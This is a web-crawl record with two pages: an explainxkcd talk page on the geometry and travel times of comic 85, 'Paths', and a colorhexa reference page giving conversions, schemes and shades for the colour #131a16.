{"ft_lang_label":"__label__en","ft_lang_prob":0.83132666,"math_prob":0.9137497,"size":1777,"snap":"2019-51-2020-05","text_gpt3_token_len":576,"char_repetition_ratio":0.15848844,"word_repetition_ratio":0.0,"special_character_ratio":0.3545301,"punctuation_ratio":0.09315068,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9784589,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,1,null,1,null,1,null,1,null,3,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-24T18:09:04Z\",\"WARC-Record-ID\":\"<urn:uuid:abe27a30-7af6-41fd-9baa-e15bc8ab2c4f>\",\"Content-Length\":\"45011\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:17b54a40-0ddf-44ab-b3ff-91e8af8123ba>\",\"WARC-Concurrent-To\":\"<urn:uuid:fd99f21d-a640-4aca-8ea6-76e461a07a4c>\",\"WARC-IP-Address\":\"206.87.224.38\",\"WARC-Target-URI\":\"https://wiki.ubc.ca/Science:Math_Exam_Resources/Courses/MATH100/December_2016/Question_04_(c)\",\"WARC-Payload-Digest\":\"sha1:2ZUJ56XSWJEQQU7LFEVW4W7N6UI7TTG5\",\"WARC-Block-Digest\":\"sha1:Z5T5X2MIQAPVEACAQXTZYHTF7QBWH67T\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579250624328.55_warc_CC-MAIN-20200124161014-20200124190014-00521.warc.gz\"}"}
https://www.explainxkcd.com/wiki/index.php/Talk:85:_Paths
[ "# Talk:85: Paths\n\nThis is the kind of thing that comes up in story problems in Calculus often. If you can travel in/over one medium at one speed, and in/over another medium at a different speed, what is the optimum path to minimize your travel time.\nAn example of this problem would be if there is a drowning swimmer 100 meters offshore, you are 300 meters from the point on the shoreline closest to the swimmer, and you can run at 15mph and swim at 2mph, how far do you run along the shoreline before going into the water to get to the swimmer as quickly as possible?\nThe fact that Randall shows two different paths over the \"grass\" makes me think that he was thinking more along the line of obsessively optimizing his path rather than about whether it might be acceptable or not to walk over the grass. -- mwburden 70.91.188.49 21:23, 13 December 2012 (UTC)\n\nAlong similar lines, this mathematician's dog uses Calculus (albeit at an intuitive, rather than mathematical level) to optimize the path that it takes to retrieve the ball from the water. -- mwburden 70.91.188.49 21:27, 13 December 2012 (UTC)\n\nThis particular situation is less interesting, since the walker's speed is the same for all three paths! This is seen by the times being directly proportional to the distances. Normally, the off-normal-path is at a lower speed, but some shorter path still gives the smallest time.DrMath 08:22, 14 October 2013 (UTC)\n\nWhere do the equations come from to figure out #2 & #3 - can anybody derive it? 108.162.219.185 (talk) (please sign your comments with ~~~~)\n\nThe equation #2 comes from the second route. t(1+√2)/3 is how far the second path takes the guy. If each block is a unit square, the diagonal to the corner is √2 while the next part is 1. The t/3 part is making it comparable to the first one (the first one is t despite it being 3 unit squares). Equation #3 is t√(5)/3. Plugging 1, 2, and √5 into wolfram|alpha for triangle side lengths makes it a right triange, so the √5 comes from the side length (assuming unit squares) while the t/3 makes it comparable to the first one.Mulan15262 (talk) 02:36, 1 December 2014 (UTC)\n\nInterestingly enough, if the three sides are equal in time taken (20 seconds each), the time it would take for path #2 would be 20rt2 + 20, and path three would be roughly 40, which comes out to 60, 48.28, and 40 seconds by using very simple geometry. 108.162.237.179 (talk) (please sign your comments with ~~~~)\n\nBased on his times, it is two squares with the same side length. Base on that geometry, Path #2 will be the hypotenuse of a 45 degree right triangle. t = √(20^2 + 20^2) = 20 * √2 = 48.28. Path #3 would be t = √(20^2 + 40^2) = 20 * √5 = 44.72. Not sure where you got roughly 40 from. Were you thinking of the sin of 30 degree rule where the hypotenuse is double the opposite side? In this case, the adjacent is double the opposite which puts the hypotenuse at √5 times the opposite.Flewk (talk) 17:10, 24 December 2015 (UTC)\n\nShouldn't this be added to Time management category?" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.96890754,"math_prob":0.973162,"size":3023,"snap":"2019-26-2019-30","text_gpt3_token_len":823,"char_repetition_ratio":0.095395826,"word_repetition_ratio":0.014678899,"special_character_ratio":0.2980483,"punctuation_ratio":0.11490683,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98859507,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-23T01:46:03Z\",\"WARC-Record-ID\":\"<urn:uuid:9ee8b080-acce-4b47-9b7b-51ef244db1fe>\",\"Content-Length\":\"23145\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:32854d79-2c07-4280-98f6-0e35c41ae13b>\",\"WARC-Concurrent-To\":\"<urn:uuid:bd791bbc-a0fe-43ec-acf3-0116a97bfd5d>\",\"WARC-IP-Address\":\"104.28.22.60\",\"WARC-Target-URI\":\"https://www.explainxkcd.com/wiki/index.php/Talk:85:_Paths\",\"WARC-Payload-Digest\":\"sha1:MFZJMYQP6YJKWQNVHZOCQJYHM33JZUOG\",\"WARC-Block-Digest\":\"sha1:UGPOBX6JNVEMPIAMMFN72I5775HNYGQU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195528635.94_warc_CC-MAIN-20190723002417-20190723024417-00296.warc.gz\"}"}
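The talk-page record above compares the travel times of the three comic paths and sets up the classic run-then-swim lifeguard problem. The sketch below is not part of the original page; it only reproduces that arithmetic. The 20-seconds-per-side grid and the 100 m / 300 m / 15 mph / 2 mph figures are taken from the comments, while the function name, the unit conversion, and the use of `scipy.optimize.minimize_scalar` are assumptions made here for illustration.

```python
import math
from scipy.optimize import minimize_scalar

# Comic paths on two unit squares, 20 s per side (figures from the comments above).
side = 20.0
path1 = 3 * side                    # around the outside: 60 s
path2 = side * math.sqrt(2) + side  # diagonal of one square, then one side: ~48.28 s
path3 = side * math.sqrt(5)         # straight across both squares: ~44.72 s
print(path1, path2, path3)

# Lifeguard problem from the first comment: run x meters along the shore, then swim.
v_run = 15 * 1609.344 / 3600.0      # 15 mph in m/s
v_swim = 2 * 1609.344 / 3600.0      # 2 mph in m/s
along, offshore = 300.0, 100.0

def total_time(x):
    return x / v_run + math.hypot(along - x, offshore) / v_swim

best = minimize_scalar(total_time, bounds=(0.0, along), method="bounded")
print("optimal run distance (m):", best.x, "total time (s):", best.fun)
```

The first three lines reproduce the 60 s / ≈48.28 s / ≈44.72 s figures discussed in the thread; the optimizer is just one convenient way to find the entry point, and the closed-form calculus approach the commenters allude to gives the same answer.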
https://www.colorhexa.com/131a16
[ "# #131a16 Color Information\n\nIn a RGB color space, hex #131a16 is composed of 7.5% red, 10.2% green and 8.6% blue. Whereas in a CMYK color space, it is composed of 26.9% cyan, 0% magenta, 15.4% yellow and 89.8% black. It has a hue angle of 145.7 degrees, a saturation of 15.6% and a lightness of 8.8%. #131a16 color hex could be obtained by blending #26342c with #000000. Closest websafe color is: #003300.\n\n• R 7\n• G 10\n• B 9\nRGB color chart\n• C 27\n• M 0\n• Y 15\n• K 90\nCMYK color chart\n\n#131a16 color description : Very dark (mostly black) cyan - lime green.\n\n# #131a16 Color Conversion\n\nThe hexadecimal color #131a16 has RGB values of R:19, G:26, B:22 and CMYK values of C:0.27, M:0, Y:0.15, K:0.9. Its decimal value is 1251862.\n\nHex triplet RGB Decimal 131a16 `#131a16` 19, 26, 22 `rgb(19,26,22)` 7.5, 10.2, 8.6 `rgb(7.5%,10.2%,8.6%)` 27, 0, 15, 90 145.7°, 15.6, 8.8 `hsl(145.7,15.6%,8.8%)` 145.7°, 26.9, 10.2 003300 `#003300`\nCIE-LAB 8.439, -4.311, 1.702 0.783, 0.935, 0.898 0.299, 0.357, 0.935 8.439, 4.635, 158.46 8.439, -2.082, 1.368 9.67, -2.475, 1.262 00010011, 00011010, 00010110\n\n# Color Schemes with #131a16\n\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1a1317\n``#1a1317` `rgb(26,19,23)``\nComplementary Color\n• #141a13\n``#141a13` `rgb(20,26,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #131a1a\n``#131a1a` `rgb(19,26,26)``\nAnalogous Color\n• #1a1314\n``#1a1314` `rgb(26,19,20)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1a131a\n``#1a131a` `rgb(26,19,26)``\nSplit Complementary Color\n• #1a1613\n``#1a1613` `rgb(26,22,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #16131a\n``#16131a` `rgb(22,19,26)``\n• #171a13\n``#171a13` `rgb(23,26,19)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #16131a\n``#16131a` `rgb(22,19,26)``\n• #1a1317\n``#1a1317` `rgb(26,19,23)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #000000\n``#000000` `rgb(0,0,0)``\n• #080b0a\n``#080b0a` `rgb(8,11,10)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1e2922\n``#1e2922` `rgb(30,41,34)``\n• #29372f\n``#29372f` `rgb(41,55,47)``\n• #33463b\n``#33463b` `rgb(51,70,59)``\nMonochromatic Color\n\n# Alternatives to #131a16\n\nBelow, you can see some colors close to #131a16. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #131a14\n``#131a14` `rgb(19,26,20)``\n• #131a15\n``#131a15` `rgb(19,26,21)``\n• #131a15\n``#131a15` `rgb(19,26,21)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #131a17\n``#131a17` `rgb(19,26,23)``\n• #131a17\n``#131a17` `rgb(19,26,23)``\n• #131a18\n``#131a18` `rgb(19,26,24)``\nSimilar Colors\n\n# #131a16 Preview\n\nThis text has a font color of #131a16.\n\n``<span style=\"color:#131a16;\">Text here</span>``\n#131a16 background color\n\nThis paragraph has a background color of #131a16.\n\n``<p style=\"background-color:#131a16;\">Content here</p>``\n#131a16 border color\n\nThis element has a border color of #131a16.\n\n``<div style=\"border:1px solid #131a16;\">Content here</div>``\nCSS codes\n``.text {color:#131a16;}``\n``.background {background-color:#131a16;}``\n``.border {border:1px solid #131a16;}``\n\n# Shades and Tints of #131a16\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #020303 is the darkest color, while #f7f9f8 is the lightest one.\n\n• #020303\n``#020303` `rgb(2,3,3)``\n• #0b0f0c\n``#0b0f0c` `rgb(11,15,12)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #1b2520\n``#1b2520` `rgb(27,37,32)``\n• #243129\n``#243129` `rgb(36,49,41)``\n• #2c3c33\n``#2c3c33` `rgb(44,60,51)``\n• #34473c\n``#34473c` `rgb(52,71,60)``\n• #3c5346\n``#3c5346` `rgb(60,83,70)``\n• #455e50\n``#455e50` `rgb(69,94,80)``\n• #4d6959\n``#4d6959` `rgb(77,105,89)``\n• #557563\n``#557563` `rgb(85,117,99)``\n• #5e806c\n``#5e806c` `rgb(94,128,108)``\n• #668b76\n``#668b76` `rgb(102,139,118)``\n• #6f9680\n``#6f9680` `rgb(111,150,128)``\n• #7a9e8a\n``#7a9e8a` `rgb(122,158,138)``\n• #86a694\n``#86a694` `rgb(134,166,148)``\n• #91af9e\n``#91af9e` `rgb(145,175,158)``\n• #9cb7a8\n``#9cb7a8` `rgb(156,183,168)``\n• #a8bfb2\n``#a8bfb2` `rgb(168,191,178)``\n• #b3c7bc\n``#b3c7bc` `rgb(179,199,188)``\n• #bed0c6\n``#bed0c6` `rgb(190,208,198)``\n``#cad8d0` `rgb(202,216,208)``\n• #d5e0da\n``#d5e0da` `rgb(213,224,218)``\n• #e0e9e4\n``#e0e9e4` `rgb(224,233,228)``\n• #ecf1ee\n``#ecf1ee` `rgb(236,241,238)``\n• #f7f9f8\n``#f7f9f8` `rgb(247,249,248)``\nTint Color Variation\n\n# Tones of #131a16\n\nA tone is produced by adding gray to any pure hue. In this case, #161716 is the less saturated color, while #022b14 is the most saturated one.\n\n• #161716\n``#161716` `rgb(22,23,22)``\n• #151816\n``#151816` `rgb(21,24,22)``\n• #131a16\n``#131a16` `rgb(19,26,22)``\n• #111c16\n``#111c16` `rgb(17,28,22)``\n• #101d16\n``#101d16` `rgb(16,29,22)``\n• #0e1f15\n``#0e1f15` `rgb(14,31,21)``\n• #0c2115\n``#0c2115` `rgb(12,33,21)``\n• #0a2315\n``#0a2315` `rgb(10,35,21)``\n• #092415\n``#092415` `rgb(9,36,21)``\n• #072614\n``#072614` `rgb(7,38,20)``\n• #052814\n``#052814` `rgb(5,40,20)``\n• #032a14\n``#032a14` `rgb(3,42,20)``\n• #022b14\n``#022b14` `rgb(2,43,20)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #131a16 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.56292254,"math_prob":0.8194501,"size":3679,"snap":"2023-14-2023-23","text_gpt3_token_len":1680,"char_repetition_ratio":0.13170068,"word_repetition_ratio":0.010989011,"special_character_ratio":0.5702637,"punctuation_ratio":0.23678415,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99201626,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-23T16:35:06Z\",\"WARC-Record-ID\":\"<urn:uuid:64d39d84-7d3f-45d4-937b-fe1258e8abcf>\",\"Content-Length\":\"36103\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6fac5731-ddbf-4d61-ace0-af0b6b7d9947>\",\"WARC-Concurrent-To\":\"<urn:uuid:553ac223-6ffa-40b9-87c0-f63eaaf7893b>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/131a16\",\"WARC-Payload-Digest\":\"sha1:6GNZI4NO66P2YO3CMYTVE6VHC3VJ2S7C\",\"WARC-Block-Digest\":\"sha1:TN2TA4PSMMO5WCXJP3HHJLIIFVRSPMER\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296945182.12_warc_CC-MAIN-20230323163125-20230323193125-00753.warc.gz\"}"}
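The color record above lists an RGB/HSL breakdown and tint/shade ladders for #131a16. The snippet below is an unaffiliated sketch of how such numbers can be derived with Python's standard library; the helper names are made up here, `colorsys` returns hue/lightness/saturation in HLS order, and the 10% linear blending step used for the tints and shades is an assumption rather than the site's exact formula.

```python
import colorsys

def hex_to_rgb(code):
    code = code.lstrip("#")
    return tuple(int(code[i:i + 2], 16) for i in (0, 2, 4))

def blend(rgb, target, t):
    # Linear blend toward `target`: white gives tints, black gives shades.
    return tuple(round(c + (o - c) * t) for c, o in zip(rgb, target))

rgb = hex_to_rgb("#131a16")                 # (19, 26, 22)
h, l, s = colorsys.rgb_to_hls(*(c / 255.0 for c in rgb))
print("hue %.1f deg, saturation %.1f%%, lightness %.1f%%" % (h * 360, s * 100, l * 100))

print("tints: ", [blend(rgb, (255, 255, 255), k / 10) for k in (1, 2, 3)])
print("shades:", [blend(rgb, (0, 0, 0), k / 10) for k in (1, 2, 3)])
```

For #131a16 this reproduces the 145.7 degree hue, 15.6% saturation and 8.8% lightness quoted above.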
https://stats.stackexchange.com/questions/197072/how-does-textrank-differentiate-between-keywords-and-simply-frequent-words-such
[ "# How does TextRank differentiate between keywords and simply frequent words, such as “is”\n\nI am trying to understand how TextRank document summary algorithm works.\n\nA few articles that I've read so far introduce text rank as a modification of page rank (e.g. article in wikipedia). However, they don't clearly explain all nuances.\n\nTherefore, I have a few questions:\n\n1. When modelling each uni-gram as a vertex, would two identical words in different places be represented as same or different vertices? For example, if the text is:\n\nUsain Bolt is the fastest runner in the world.\n\n\nwould there be two vertices for word the, or just one?\n\n2. After calculating the limiting distribution (i.e rank) of every vertex, how do we merge several uni-grams with high rank into one? If the top 3 uni-grams are all far away from each other in the text, what would get merged with what?\n\n3. Words such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\n4. How is TextRank better than simply counting each keyword appearing in the text, and merging all words that have the highest count? (Assume that problem 3 is solved separately)\n\nThe first question:\n\nWhen modelling each uni-gram as a vertex, would two identical words in different places be represented as same or different vertices?\n\nIt will be represented as the same(just one). (In your example \"the\" will usually be dropped since it's a stop word). For illustration, please refer to this example from this paper. It is by treating them as the same to draw the edges between it and other different words.", null, "For the text:\n\nCompatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types systems and systems of mixed types.\n\nThe second question:\n\nAfter calculating the limiting distribution (i.e rank) of every vertex, how do we merge several uni-grams with high rank into one? If the top 3 uni-grams are all far away from each other in the text, what would get merged with what?\n\nOnly when they are connected to each other in the original text we should merge them. For instance in the aforementioned example, \"linear\" and \"system\" are concatenate in the text, so \"linear system\" will be treated as a phrase, provided only adj. and n. are considered in this context.\n\nQuestion 3:\n\nWords such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\nWords such as \"the\" and \"a\" or \"of\" will be deleted. Refer to here. However open class words, such as nouns, adjectives and etc. are important.\n\nThe last question:\n\nHow is TextRank better than simply counting each keyword appearing in the text, and merging all words that have the highest count? (Assume that problem 3 is solved separately).\n\nBy the word occurrence method:\n\nword_list = \"Compatibility of systems of linear constraints over the set of natural numbers. 
Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types systems and systems of mixed types.\"\nfrom nltk.tokenize import RegexpTokenizer  # imports required by this snippet (NLTK)\nfrom nltk.corpus import stopwords\nword_list = word_list.lower()\ntokenizer = RegexpTokenizer(r'\\w+')\ntokens = tokenizer.tokenize(word_list)\nword_list = [w for w in tokens if w not in stopwords.words('english')]\ndic = {i: word_list.count(i) for i in word_list}  # frequency of each remaining word\nsorted_words = sorted(dic.items(), key=lambda x: x[1], reverse=True)  # sort by count, descending\n\n\nWe can get the following result (a part):\n\n('systems', 4), ('set', 3), ('solutions', 3), ('minimal', 3), ('types', 3), ('linear', 2), ('algorithms', 2), ('constructing', 1), ('numbers.', 1), ('considered.', 1), ('equations,', 1), ('given.', 1), ('inequations,', 1), ('solving', 1), ('system', 1), ('compatibility', 1), ('strict', 1), ('criteria', 1), ('supporting', 1),\n\nIt's much worse than the result from TextRank:\n\nlinear constraints; linear diophantine equations; natural numbers; nonstrict inequations; strict inequations; upper bounds\n\nLet alone the result by a human:\n\nlinear constraints; linear diophantine equations; minimal generating sets; non−strict inequations; set of natural numbers; strict inequations; upper bounds\n\nAs we can see, we lost the information given by the context, especially the voting (or recommendation) that is the core concept of the PageRank algorithm. Every connection in a window is a vote for both of the words (in the undirected graph or Markov model).\n\nlerner already provided a pretty comprehensive answer, but one technique he didn't mention that is useful in practice is using a TF-IDF model.\n\nWords such as the or is will always have a high rank, simply because they frequently occur in the text. However, they are not key phrases. How to distinguish them from real key words?\n\nlerner already mentioned stopword filtering. In addition to that method, modern implementations also use information from a TF-IDF model. IDFs capture frequencies of words across documents. They naturally scale down the scores of common words, thus making them count less in comparisons. Also they can be used for stopword removal by thresholding (you can just drop words that occur in more than $n$ sentences)." ]
[ null, "https://i.stack.imgur.com/ohF5r.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88471824,"math_prob":0.9381979,"size":3944,"snap":"2019-43-2019-47","text_gpt3_token_len":899,"char_repetition_ratio":0.12461929,"word_repetition_ratio":0.2640264,"special_character_ratio":0.22895537,"punctuation_ratio":0.15866667,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9880707,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-15T22:38:56Z\",\"WARC-Record-ID\":\"<urn:uuid:da39d065-f648-4436-9f9b-5d03724ffd73>\",\"Content-Length\":\"145032\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5757ba40-8cda-4184-a20e-6e966a8a6039>\",\"WARC-Concurrent-To\":\"<urn:uuid:f520e809-8fff-40cb-a3c9-0756ba09129f>\",\"WARC-IP-Address\":\"151.101.1.69\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/197072/how-does-textrank-differentiate-between-keywords-and-simply-frequent-words-such\",\"WARC-Payload-Digest\":\"sha1:GHXJSWGAGSTPV6ZJVLOSDO7B7LPCE2FD\",\"WARC-Block-Digest\":\"sha1:D7B7244QO2HLM2OEIO67GLBC6KZVAXTO\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668716.22_warc_CC-MAIN-20191115222436-20191116010436-00078.warc.gz\"}"}
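The Q&A record above contrasts raw frequency counting with TextRank's voting on a word co-occurrence graph. Below is a rough sketch of that graph idea using `networkx.pagerank`; the window size, the simple regex tokenizer, the tiny stop-word list, and the omission of the part-of-speech filter are all simplifications made here, not the original TextRank algorithm or the answerer's code.

```python
import re
import networkx as nx

STOPWORDS = {"of", "the", "a", "and", "for", "are", "is", "in", "all", "can", "be", "these", "used"}

def textrank_keywords(text, window=2, top=8):
    # Build an undirected co-occurrence graph: words within `window` positions vote for each other.
    words = [w for w in re.findall(r"[a-z]+", text.lower()) if w not in STOPWORDS]
    graph = nx.Graph()
    for i, w in enumerate(words):
        for other in words[i + 1:i + 1 + window]:
            if other != w:
                graph.add_edge(w, other)
    scores = nx.pagerank(graph)      # the "voting" step
    return sorted(scores, key=scores.get, reverse=True)[:top]

text = ("Compatibility of systems of linear constraints over the set of natural numbers. "
        "Criteria of compatibility of a system of linear Diophantine equations, strict "
        "inequations, and nonstrict inequations are considered.")
print(textrank_keywords(text))
```

The point, as the answer argues, is that words are scored by the company they keep in the window graph rather than by raw frequency alone.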
https://de.mathworks.com/matlabcentral/cody/problems/1807-04-scalar-equations-2/solutions/2802925
[ "Cody\n\n# Problem 1807. 04 - Scalar Equations 2\n\nSolution 2802925\n\nSubmitted on 6 Aug 2020 by Sanveg Rane\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\na=10; b=2.5e23; ref = (sqrt(a)+b^(1/21))^pi; user = MyFunc(); assert(isequal(user,ref))\n\n2   Pass\n[y a b] = MyFunc(); assert(a==10);\n\n3   Pass\n[y a b] = MyFunc(); assert(b==2.5e23);" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57134473,"math_prob":0.96417063,"size":441,"snap":"2020-34-2020-40","text_gpt3_token_len":145,"char_repetition_ratio":0.14416476,"word_repetition_ratio":0.057971016,"special_character_ratio":0.39229023,"punctuation_ratio":0.14736842,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9833754,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-01T09:12:49Z\",\"WARC-Record-ID\":\"<urn:uuid:52364496-ce38-48cf-8e17-4f4a1928fc7d>\",\"Content-Length\":\"76985\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5b6cbf25-68f7-4db3-a7de-1a0896fff8e5>\",\"WARC-Concurrent-To\":\"<urn:uuid:9ca571fb-b4ca-4d34-a83b-b7eb350dee34>\",\"WARC-IP-Address\":\"104.117.0.182\",\"WARC-Target-URI\":\"https://de.mathworks.com/matlabcentral/cody/problems/1807-04-scalar-equations-2/solutions/2802925\",\"WARC-Payload-Digest\":\"sha1:7PMCC3K6KSQTHWTXLXVLCANET4VXMLYQ\",\"WARC-Block-Digest\":\"sha1:SU4FOEVO2ZIIR5YYPDCVHOEWWZBBLAVJ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600402124756.81_warc_CC-MAIN-20201001062039-20201001092039-00120.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/3844
[ "# Document (#3844)\n\nAuthor\nGeyser, E.P.\nBrakel, P.A. van\nTitle\nMan-machine interaction as a factor in the design of computerised information retrieval systems\nSource\nSouth African journal of library and information science. 59(1991) no.4, S.256-260\nYear\n1991\nAbstract\nDesigners of information retrieval systems are neglecting the unique relationship between an intermediary and the search system, be it a small microcomputer database system or larger systems such as OPACs or online database hosts. When designing user-friendly retrieval systems, a thorough knowledge of the interface of the machine as well as the nature and needs of the user is needed. For this purpose, 2 modles can be distinguished, namely, the mental model of the user and the conceptual model of the designer of the system. It is the task of the system designer to make these 2 models coincide. The conceptual model is the actual model of the retrieval systems as it is presented to the user by the designer of the system. The mental model is that model of the retrieval system through past experience with a particular or a number of systems. For this reason, experienced users may have a more clearly defined model of a specific system than the novice. The nature of the communication between man and machine is also explained, as well as a number of features of the interaction between the searcher and the computer. Specific hardware and software problems relating to man-machine interaction are discussed\n\n## Similar documents (author)\n\n1. Brakel, P.A.V.: Scholarly communication in the academic environment : the potential role of Internet's World Wide Web (1995) 5.92\n```5.9235125 = sum of:\n5.9235125 = weight(author_txt:brakel in 5473) [ClassicSimilarity], result of:\n5.9235125 = fieldWeight in 5473, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.625 = fieldNorm(doc=5473)\n```\n2. Brakel, P.A. van: CD-ROM encyclopedias (1991) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 2361) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 2361, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=2361)\n```\n3. Brakel, P.A. v.: Electronic journals : publishing via Internet's Wolrd Wide Web (1995) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 3455) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 3455, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=3455)\n```\n4. Brakel, P.A. van: Twenty years of training in online searching : integrating the Internet with the teaching programme (1996) 4.74\n```4.73881 = sum of:\n4.73881 = weight(author_txt:brakel in 88) [ClassicSimilarity], result of:\n4.73881 = fieldWeight in 88, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.5 = fieldNorm(doc=88)\n```\n5. Mountifield, H.M.; Brakel, P.A. v.: Network-based electronic journals : a new source of information (1994) 4.15\n```4.1464586 = sum of:\n4.1464586 = weight(author_txt:brakel in 419) [ClassicSimilarity], result of:\n4.1464586 = fieldWeight in 419, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n9.47762 = idf(docFreq=8, maxDocs=43254)\n0.4375 = fieldNorm(doc=419)\n```\n\n## Similar documents (content)\n\n1. 
Koshman, S.: Testing user interaction with a prototype visualization-based information retrieval system (2005) 0.24\n```0.24441893 = sum of:\n0.24441893 = product of:\n0.7638092 = sum of:\n0.060475033 = weight(abstract_txt:novice in 5563) [ClassicSimilarity], result of:\n0.060475033 = score(doc=5563,freq=1.0), product of:\n0.13506456 = queryWeight, product of:\n7.1639853 = idf(docFreq=90, maxDocs=43254)\n0.018853271 = queryNorm\n0.44774908 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1639853 = idf(docFreq=90, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.020776933 = weight(abstract_txt:between in 5563) [ClassicSimilarity], result of:\n0.020776933 = score(doc=5563,freq=1.0), product of:\n0.095554695 = queryWeight, product of:\n1.4568536 = boost\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.018853271 = queryNorm\n0.21743497 = fieldWeight in 5563, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.4789596 = idf(docFreq=3625, maxDocs=43254)\n0.0625 = fieldNorm(doc=5563)\n0.06553341 = weight(abstract_txt:user in 5563) [ClassicSimilarity], result of:\n0.06553341 = score(doc=5563,freq=4.0), product of:\n0.14249486 = queryWeight, product of:\n2.0542765 = boost\n3.6792014 = idf(docFreq=2967, maxDocs=43254)\n0.018853271 = queryNorm\n0.45990017 = fieldWeight in 5563, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.6792014 = 